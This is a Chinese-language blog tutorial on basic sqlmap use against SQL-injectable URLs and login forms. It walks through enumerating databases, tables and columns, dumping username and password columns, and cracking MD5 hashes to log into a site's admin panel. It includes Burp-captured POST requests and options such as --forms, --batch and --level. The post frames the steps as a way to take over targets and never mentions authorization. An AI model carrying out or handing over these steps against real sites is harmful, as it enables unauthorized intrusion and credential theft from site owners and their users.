上篇我们讲到了如何查找sql漏洞,这篇我们来讲一下sqlmap最基础的用法,,没有看过上篇文章的建议看完再说,安装sqlmap需要Python2环境,当然也有免py的,kali自带

其实相对高级点的用法大多是为了节省时间,对于新手来说,大家无法判断是那种注入类型使用高级手法可能会花更多时间

1.url中的sql注入

我们使用sqlmap -u http://xxx.xxx.xxx/xxx.php?id=1 – -dbs

不难看出 -u指定了一个存在sql注入漏洞的url, –dbs指获取数据库名,

等待一段时间,出现了数据库名,假设数据库名为yich,我们使用sqlmap -u http://xxx.xxx.xxx/xxx.php?id=1 -D yich – -tables

-D 指定了数据库,也就是上一步我们获取到的数据库,这样sqlmap才知道你想要那个数据库里的信息。–tables意味着获取表名,也就是获取刚才指定的数据库的表

我们会拿到表名,但通常我们只对users,admin,user这样的表感兴趣,因为里面存放了管理员的用户名和密码,我们完全可以通过这些信息登录到后台,我们假设这个网站的密码存放在users里。所以我们键入sqlmap -u http://xxx.xxx.xxx/xxx.php?id=1 -D yich -T users – -columns

其他的都不用我说了,–columns指对列名(字段名)进行枚举

现在列名出来了,我们要获取某个列的信息,就像上次一样
sqlmap -u http://xxx.xxx.xxx/xxx.php?id=1 -D yich -T users – -columns -C name,passord – -dump

直接拿到用户名和密码,别急,还差最后一步,把密码由md5值转换成常规的,拿去登录就ok了

2.表单的sql注入

上篇讲的登录框和搜索框其实都是表单,都是一样一样的。

1. 浏览器打开目标地址http:// www.xxx.com /Login.asp

2. 配置burp代理(127.0.0.1:8080)以拦截请求

3. 点击login表单的submit按钮

4. 这时候Burp会拦截到了我们的登录POST请求

5. 把这个post请求复制为txt, 我这命名为search-test.txt 然后把它放至sqlmap目录下

6. 运行sqlmap并使用如下命令:

sqlmap -r search-test.txt -p tfUPass
-r指定了文件,-p指定了探测技术

但如果你懒,懒得用burp,直接sqlmap -u url – -forms自动搜索虽然准确率会低些

之后的步骤跟上面的一样了

值得一提的是,探测途中会出现很多让你选择的地方,通常直接选y就完了,如果怕麻烦,在之前就加一个参数,- -batch使它自动的选择y。

如果没探测出来,试试加一个参数 – -level 3 增加探测深度,level默认1,最高5。还是不行,就手注看看问题所在,还是不行,就算了吧,回去好好在学技术。

现在sql注入依然重要,之前的火绒的官网也被发现了注入漏洞,sql牛逼


By yich

在 “SQLMAP基础用法” 有 1 条评论

发表评论

电子邮件地址不会被公开。 必填项已用*标注